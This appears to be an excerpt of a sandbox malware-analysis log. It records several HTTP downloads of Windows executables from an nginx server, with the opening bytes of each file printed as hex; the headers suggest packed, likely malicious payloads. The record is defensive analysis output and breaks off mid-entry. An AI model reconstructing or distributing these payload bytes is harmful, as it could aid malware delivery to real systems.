Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 10 Nov 2024 03:55:31 GMTContent-Type: application/octet-streamContent-Length: 3258368Last-Modified: Sun, 10 Nov 2024 03:45:43 GMTConnection: keep-aliveETag: "67302c67-31b800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 c0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 31 00 00 04 00 00 12 b5 32 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc ad 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c ad 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 92 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 62 72 62 7a 67 71 61 68 00 00 2b 00 00 b0 06 00 00 fe 2a 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6c 78 78 62 70 65 6a 00 10 00 00 00 b0 31 00 00 04 00 00 00 92 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 31 00 00 22 00 00 00 96 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 10 Nov 2024 03:56:07 GMTContent-Type: application/octet-streamContent-Length: 126976Last-Modified: Fri, 08 Nov 2024 09:03:51 GMTConnection: keep-aliveETag: "672dd3f7-1f000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c8 f9 ef 50 8c 98 81 03 8c 98 81 03 8c 98 81 03 98 f3 82 02 86 98 81 03 98 f3 84 02 05 98 81 03 98 f3 85 02 9e 98 81 03 de ed 85 02 83 98 81 03 de ed 82 02 9d 98 81 03 de ed 84 02 ad 98 81 03 98 f3 80 02 8b 98 81 03 8c 98 80 03 ed 98 81 03 40 ed 88 02 8f 98 81 03 40 ed 81 02 8d 98 81 03 40 ed 7e 03 8d 98 81 03 40 ed 83 02 8d 98 81 03 52 69 63 68 8c 98 81 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 4a b8 2d 67 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1d 00 44 01 00 00 b4 00 00 00 00 00 00 62 70 00 00 00 10 00 00 00 60 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 d0 cc 01 00 9c 00 00 00 6c cd 01 00 50 00 00 00 00 00 02 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 f8 1a 00 00 44 bb 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 bb 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 06 43 01 00 00 10 00 00 00 44 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ea 74 00 00 00 60 01 00 00 76 00 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 1f 00 00 00 e0 01 00 00 14 00 00 00 be 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 00 02 00 00 02 00 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f8 1a 00 00 00 10 02 00 00 1c 00 00 00 d4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 10 Nov 2024 03:56:11 GMTContent-Type: application/octet-streamContent-Length: 126976Last-Modified: Fri, 08 Nov 2024 09:03:51 GMTConnection: keep-aliveETag: "672dd3f7-1f000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c8 f9 ef 50 8c 98 81 03 8c 98 81 03 8c 98 81 03 98 f3 82 02 86 98 81 03 98 f3 84 02 05 98 81 03 98 f3 85 02 9e 98 81 03 de ed 85 02 83 98 81 03 de ed 82 02 9d 98 81 03 de ed 84 02 ad 98 81 03 98 f3 80 02 8b 98 81 03 8c 98 80 03 ed 98 81 03 40 ed 88 02 8f 98 81 03 40 ed 81 02 8d 98 81 03 40 ed 7e 03 8d 98 81 03 40 ed 83 02 8d 98 81 03 52 69 63 68 8c 98 81 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 4a b8 2d 67 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1d 00 44 01 00 00 b4 00 00 00 00 00 00 62 70 00 00 00 10 00 00 00 60 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 d0 cc 01 00 9c 00 00 00 6c cd 01 00 50 00 00 00 00 00 02 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 f8 1a 00 00 44 bb 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 bb 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 06 43 01 00 00 10 00 00 00 44 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ea 74 00 00 00 60 01 00 00 76 00 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 1f 00 00 00 e0 01 00 00 14 00 00 00 be 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 00 02 00 00 02 00 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f8 1a 00 00 00 10 02 00 00 1c 00 00 00 d4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 10 Nov 2024 03:56:15 GMTContent-Type: application/octet-streamContent-Length: 3205120Last-Modified: Sun, 10 Nov 2024 03:45:20 GMTConnection: keep-aliveETag: "67302c50-30e800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 f0 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 31 00 00 04 00 00 5d f0 30 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 80 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 40 03 00 00 00 90 05 00 00 04 00 00 00 90 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6e 72 6f 6b 72 7a 63 68 00 30 2b 00 00 b0 05 00 00 2c 2b 00 00 96 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 63 6a 7a 71 71 76 75 00 10 00 00 00 e0 30 00 00 04 00 00 00 c2 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 30 00 00 22 00 00 00 c6 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 10 Nov 2024 03:56:21 GMTContent-Type: application/octet-streamContent-Length: 1769472Last-Modified: Sun, 10 Nov 2024 03:45:33 GMTConnection: keep-aliveETag: "67302c5d-1b0000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 10 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 68 00 00 04 00 00 6d 38 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 29 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 7a 7a 65 62 6b 7a 72 00 70 19 00 00 90 4e 00 00 62 19 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 6a 6f 76 79 65 73 77 00 10 00 00 00 00 68 00 00 06 00 00 00 d8 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 68 00 00 22 00 00 00 de 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 10 Nov 2024 03:56:40 GMTContent-Type: application/octet-streamContent-Length: 2825728Last-Modified: Sun, 10 Nov 2024 03:14:48 GMTConnection: keep-aliveETag: "67302528-2b1e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2b 00 00 04 00 00 a5 d6 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 72 68 64 76 71 68 62 69 00 c0 2a 00 00 a0 00 00 00 be 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 63 66 78 6e 74 65 66 00 20 00 00 00 60 2b 00 00 04 00 00 00 f8 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 2b 00 00 22 00 00 00 fc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 10 Nov 2024 03:56:41 GMTContent-Type: application/octet-streamContent-Length: 2825728Last-Modified: Sun, 10 Nov 2024 03:14:50 GMTConnection: keep-aliveETag: "6730252a-2b1e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2b 00 00 04 00 00 a5 d6 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 72 68 64 76 71 68 62 69 00 c0 2a 00 00 a0 00 00 00 be 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 63 66 78 6e 74 65 66 00 20 00 00 00 60 2b 00 00 04 00 00 00 f8 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 2b 00 00 22 00 00 00 fc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 10 Nov 2024 03:57:01 GMTContent-Type: application/octet-streamContent-Length: 1769472Last-Modified: Sun, 10 Nov 2024 03:45:33 GMTConnection: keep-aliveETag: "67302c5d-1b0000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a 